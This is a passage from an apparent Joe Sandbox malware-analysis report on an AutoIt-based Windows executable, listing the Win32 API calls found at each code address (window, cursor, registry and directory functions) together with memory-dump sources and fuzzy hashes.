                                                                        • SelectObject.GDI32(?,00EDD2A5), ref: 00EDD729
                                                                        • DeleteObject.GDI32(?), ref: 00EDD734
                                                                        • SelectObject.GDI32(?,?), ref: 00EDD73A
                                                                        • DeleteObject.GDI32(?), ref: 00EDD73F
                                                                        • SetTextColor.GDI32(?,?), ref: 00EDD745
                                                                        • SetBkColor.GDI32(?,?), ref: 00EDD74F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                        • String ID:
                                                                        • API String ID: 1996641542-0
                                                                        • Opcode ID: bf78c4a1d8e6f4789d13fd75d125663bce24cbdf7a7c1daca7c4a973f716d27b
                                                                        • Instruction ID: ccd4cb2414f27ca6ab8b84e38b0e84fea0da50c8611741a68552f2ceed3daa20
                                                                        • Opcode Fuzzy Hash: bf78c4a1d8e6f4789d13fd75d125663bce24cbdf7a7c1daca7c4a973f716d27b
                                                                        • Instruction Fuzzy Hash: FC515C71905208EFDB10AFA5DC48EAE7F7AEF88324F104116F915BB2A0D7719A45DF90
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00EDB7B0
                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EDB7C1
                                                                        • CharNextW.USER32(0000014E), ref: 00EDB7F0
                                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00EDB831
                                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00EDB847
                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EDB858
                                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00EDB875
                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00EDB8C7
                                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00EDB8DD
                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00EDB90E
                                                                        • _memset.LIBCMT ref: 00EDB933
                                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00EDB97C
                                                                        • _memset.LIBCMT ref: 00EDB9DB
                                                                        • SendMessageW.USER32 ref: 00EDBA05
                                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00EDBA5D
                                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 00EDBB0A
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00EDBB2C
                                                                        • GetMenuItemInfoW.USER32(?), ref: 00EDBB76
                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00EDBBA3
                                                                        • DrawMenuBar.USER32(?), ref: 00EDBBB2
                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00EDBBDA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                        • String ID: 0
                                                                        • API String ID: 1073566785-4108050209
                                                                        • Opcode ID: a93362df1d9734d97a1d91fa9d696670f79683a4ef43e1ab37c93084c8615522
                                                                        • Instruction ID: f1e67886173fce7032d30a9e2f0157f08fb32e1881fd391be713e13b9661ceed
                                                                        • Opcode Fuzzy Hash: a93362df1d9734d97a1d91fa9d696670f79683a4ef43e1ab37c93084c8615522
                                                                        • Instruction Fuzzy Hash: 53E17B75900208EFDF209FA1CC85AEE7BB8EF45714F119157F919BA290EB708A46DF60
                                                                        APIs
                                                                        • GetCursorPos.USER32(?), ref: 00ED778A
                                                                        • GetDesktopWindow.USER32 ref: 00ED779F
                                                                        • GetWindowRect.USER32(00000000), ref: 00ED77A6
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00ED7808
                                                                        • DestroyWindow.USER32(?), ref: 00ED7834
                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00ED785D
                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00ED787B
                                                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00ED78A1
                                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 00ED78B6
                                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00ED78C9
                                                                        • IsWindowVisible.USER32(?), ref: 00ED78E9
                                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00ED7904
                                                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00ED7918
                                                                        • GetWindowRect.USER32(?,?), ref: 00ED7930
                                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00ED7956
                                                                        • GetMonitorInfoW.USER32 ref: 00ED7970
                                                                        • CopyRect.USER32(?,?), ref: 00ED7987
                                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 00ED79F2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                        • String ID: ($0$tooltips_class32
                                                                        • API String ID: 698492251-4156429822
                                                                        • Opcode ID: 409eed3899e3285d2b0d8bf71b46c649d6f1ae555cf40a5addf3781c6e9c9560
                                                                        • Instruction ID: 1d23d70ac308d424f2d596ae1a3baee5cafcf586fbc66fb77ec81acd84cf0fc2
                                                                        • Opcode Fuzzy Hash: 409eed3899e3285d2b0d8bf71b46c649d6f1ae555cf40a5addf3781c6e9c9560
                                                                        • Instruction Fuzzy Hash: 4FB1A071608341AFDB04DF65C948B6ABBE5FF88314F00991EF5D9AB291E770E805CB91
                                                                        APIs
                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E8A939
                                                                        • GetSystemMetrics.USER32(00000007), ref: 00E8A941
                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E8A96C
                                                                        • GetSystemMetrics.USER32(00000008), ref: 00E8A974
                                                                        • GetSystemMetrics.USER32(00000004), ref: 00E8A999
                                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00E8A9B6
                                                                        • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00E8A9C6
                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00E8A9F9
                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00E8AA0D
                                                                        • GetClientRect.USER32(00000000,000000FF), ref: 00E8AA2B
                                                                        • GetStockObject.GDI32(00000011), ref: 00E8AA47
                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E8AA52
                                                                          • Part of subcall function 00E8B63C: GetCursorPos.USER32(000000FF), ref: 00E8B64F
                                                                          • Part of subcall function 00E8B63C: ScreenToClient.USER32(00000000,000000FF), ref: 00E8B66C
                                                                          • Part of subcall function 00E8B63C: GetAsyncKeyState.USER32(00000001), ref: 00E8B691
                                                                          • Part of subcall function 00E8B63C: GetAsyncKeyState.USER32(00000002), ref: 00E8B69F
                                                                        • SetTimer.USER32(00000000,00000000,00000028,00E8AB87), ref: 00E8AA79
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                        • String ID: AutoIt v3 GUI
                                                                        • API String ID: 1458621304-248962490
                                                                        • Opcode ID: 140212d015740c4c7a155d69e190d7a02cbf251681f2e4fe765527d2b5de6968
                                                                        • Instruction ID: bf8a2d87444c8d84b4a2a28ed256b3ee5efdae57e15fda08409bf98655e59a50
                                                                        • Opcode Fuzzy Hash: 140212d015740c4c7a155d69e190d7a02cbf251681f2e4fe765527d2b5de6968
                                                                        • Instruction Fuzzy Hash: 57B1BE7160420A9FDB04EFA8DC45BED7BB5FB48324F15522AFA19B7290DB70E840CB51
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Foreground
                                                                        • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                        • API String ID: 62970417-1919597938
                                                                        • Opcode ID: 1055b248e6c71c7a44b50a2a8ccd36deb078caaf9d0aa2a2634cfe3771f132f0
                                                                        • Instruction ID: deb0907c2ca6d59072adc0102f6c99e4347c76be46dc5088011f792f092cf7bb
                                                                        • Opcode Fuzzy Hash: 1055b248e6c71c7a44b50a2a8ccd36deb078caaf9d0aa2a2634cfe3771f132f0
                                                                        • Instruction Fuzzy Hash: F6D1E830508686AFCB04EF21C841A9ABBF4FF54304F10A91DF65A775A2DB30E95ADB91
                                                                        APIs
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00ED3735
                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00F0DC00,00000000,?,00000000,?,?), ref: 00ED37A3
                                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00ED37EB
                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00ED3874
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00ED3B94
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00ED3BA1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Close$ConnectCreateRegistryValue
                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                        • API String ID: 536824911-966354055
                                                                        • Opcode ID: 7309a11885db6929e99e49632cc53529291a2e7eedf785f8bfd69ad1e92bde42
                                                                        • Instruction ID: 6d6d0dabf63234c8f54f3e96a16eb45172837c17ca496e7efab9e332bb1b201d
                                                                        • Opcode Fuzzy Hash: 7309a11885db6929e99e49632cc53529291a2e7eedf785f8bfd69ad1e92bde42
                                                                        • Instruction Fuzzy Hash: D4025E75204601AFCB14EF24C855A2EB7E5FF88714F04945DF99AAB3A2DB30ED41CB82
                                                                        APIs
                                                                        • CharUpperBuffW.USER32(?,?), ref: 00ED6C56
                                                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00ED6D16
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharMessageSendUpper
                                                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                        • API String ID: 3974292440-719923060
                                                                        • Opcode ID: 2ac40d8d9001db2e4d92136b78f24683db6288639d2b361d20765fd11b8a6ed2
                                                                        • Instruction ID: dc8d7dc02a70c0f28785698a50a996afd7e43bd57df82c7caecf29bb75cd491c
                                                                        • Opcode Fuzzy Hash: 2ac40d8d9001db2e4d92136b78f24683db6288639d2b361d20765fd11b8a6ed2
                                                                        • Instruction Fuzzy Hash: 13A14E302142419FCB14FF14D951A6AB3E6EF95314F14A96EB85ABB3D2DB30ED06CB41
                                                                        APIs
                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00EACF91
                                                                        • __swprintf.LIBCMT ref: 00EAD032
                                                                        • _wcscmp.LIBCMT ref: 00EAD045
                                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00EAD09A
                                                                        • _wcscmp.LIBCMT ref: 00EAD0D6
                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00EAD10D
                                                                        • GetDlgCtrlID.USER32(?), ref: 00EAD15F
                                                                        • GetWindowRect.USER32(?,?), ref: 00EAD195
                                                                        • GetParent.USER32(?), ref: 00EAD1B3
                                                                        • ScreenToClient.USER32(00000000), ref: 00EAD1BA
                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00EAD234
                                                                        • _wcscmp.LIBCMT ref: 00EAD248
                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00EAD26E
                                                                        • _wcscmp.LIBCMT ref: 00EAD282
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                        • String ID: %s%u
                                                                        • API String ID: 3119225716-679674701
                                                                        • Opcode ID: 3692e0fdf20cc2332e64860e9832e33f3f62c4370bf30f31829120cee072dd67
                                                                        • Instruction ID: 612ff94b658458a415ef4fefafc71dca2e6a84b713448b45c02ef93d552b8d6c
                                                                        • Opcode Fuzzy Hash: 3692e0fdf20cc2332e64860e9832e33f3f62c4370bf30f31829120cee072dd67
                                                                        • Instruction Fuzzy Hash: 58A1F471608302AFD714DF64CC84BAAB7E9FF49318F009519F99AEA590DB30F905CBA1
                                                                        APIs
                                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 00EAD8EB
                                                                        • _wcscmp.LIBCMT ref: 00EAD8FC
                                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 00EAD924
                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 00EAD941
                                                                        • _wcscmp.LIBCMT ref: 00EAD95F
                                                                        • _wcsstr.LIBCMT ref: 00EAD970
                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00EAD9A8
                                                                        • _wcscmp.LIBCMT ref: 00EAD9B8
                                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 00EAD9DF
                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00EADA28
                                                                        • _wcscmp.LIBCMT ref: 00EADA38
                                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 00EADA60
                                                                        • GetWindowRect.USER32(00000004,?), ref: 00EADAC9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                        • String ID: @$ThumbnailClass
                                                                        • API String ID: 1788623398-1539354611
                                                                        • Opcode ID: 1284ae7bf9361e345a26a506fbfcfed5a099efce2c01b89eae001496bba61d83
                                                                        • Instruction ID: 12c6ef31e8dff5084ab234ea207583b7377a6693f388e803f65fa4f5859f2c53
                                                                        • Opcode Fuzzy Hash: 1284ae7bf9361e345a26a506fbfcfed5a099efce2c01b89eae001496bba61d83
                                                                        • Instruction Fuzzy Hash: 6D81927110C2059FDB05DF10CC85BAA7BE8EF89718F049469FD8AAE096DB70ED45CBA1
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsnicmp
                                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                        • API String ID: 1038674560-1810252412
                                                                        • Opcode ID: 88b1f946a445db867364e258fab368dd263978fae71f66921d8357918e04fcf9
                                                                        • Instruction ID: 8bc092f8a62e9bb5ec9051fc861799a9e85e9721e89ce0955f89d7b5247f5f39
                                                                        • Opcode Fuzzy Hash: 88b1f946a445db867364e258fab368dd263978fae71f66921d8357918e04fcf9
                                                                        • Instruction Fuzzy Hash: 6E31DE32A48209BADB18EA50ED43EEDB3F89F25714F602069F446B94D1EB61FF04D612
                                                                        APIs
                                                                        • LoadIconW.USER32(00000063), ref: 00EAEAB0
                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00EAEAC2
                                                                        • SetWindowTextW.USER32(?,?), ref: 00EAEAD9
                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00EAEAEE
                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00EAEAF4
                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00EAEB04
                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00EAEB0A
                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00EAEB2B
                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00EAEB45
                                                                        • GetWindowRect.USER32(?,?), ref: 00EAEB4E
                                                                        • SetWindowTextW.USER32(?,?), ref: 00EAEBB9
                                                                        • GetDesktopWindow.USER32 ref: 00EAEBBF
                                                                        • GetWindowRect.USER32(00000000), ref: 00EAEBC6
                                                                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00EAEC12
                                                                        • GetClientRect.USER32(?,?), ref: 00EAEC1F
                                                                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00EAEC44
                                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00EAEC6F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                        • String ID:
                                                                        • API String ID: 3869813825-0
                                                                        • Opcode ID: b72856d468ddc8e3dcec0c68ef36e70cec9c1dd47e6f7143bbaa901d398d90a3
                                                                        • Instruction ID: fd0767849fbec5c702969f3b4a9a44fbbde976f9af44f69d3e84629435520f7e
                                                                        • Opcode Fuzzy Hash: b72856d468ddc8e3dcec0c68ef36e70cec9c1dd47e6f7143bbaa901d398d90a3
                                                                        • Instruction Fuzzy Hash: 5B514C71900709EFDB209FA9CD89B6EBBF5FF48708F004928E596B66A0C774B944DB10
                                                                        APIs
                                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 00EC79C6
                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00EC79D1
                                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00EC79DC
                                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 00EC79E7
                                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 00EC79F2
                                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 00EC79FD
                                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 00EC7A08
                                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 00EC7A13
                                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 00EC7A1E
                                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 00EC7A29
                                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00EC7A34
                                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 00EC7A3F
                                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00EC7A4A
                                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 00EC7A55
                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00EC7A60
                                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 00EC7A6B
                                                                        • GetCursorInfo.USER32(?), ref: 00EC7A7B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Cursor$Load$Info
                                                                        • String ID:
                                                                        • API String ID: 2577412497-0
                                                                        • Opcode ID: 4043bdcf8170b4ffa7c91efcc90bdcb0d8e67f7121faaa4e4bd0a67c27ff019f
                                                                        • Instruction ID: 9fc0b7f4ee2d5ca840f3dcd4e322b954f0a996ff55d0458af31ed5c1f19524f2
                                                                        • Opcode Fuzzy Hash: 4043bdcf8170b4ffa7c91efcc90bdcb0d8e67f7121faaa4e4bd0a67c27ff019f
                                                                        • Instruction Fuzzy Hash: C43129B0D083196ADB109FB68C89D9FBFE8FF04754F50452AE54DF7180DA79A5018F91
                                                                        APIs
                                                                          • Part of subcall function 00E8E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00E7C8B7,?,00002000,?,?,00000000,?,00E7419E,?,?,?,00F0DC00), ref: 00E8E984
                                                                          • Part of subcall function 00E7660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E753B1,?,?,00E761FF,?,00000000,00000001,00000000), ref: 00E7662F
                                                                        • __wsplitpath.LIBCMT ref: 00E7C93E
                                                                          • Part of subcall function 00E91DFC: __wsplitpath_helper.LIBCMT ref: 00E91E3C
                                                                        • _wcscpy.LIBCMT ref: 00E7C953
                                                                        • _wcscat.LIBCMT ref: 00E7C968
                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00E7C978
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00E7CABE
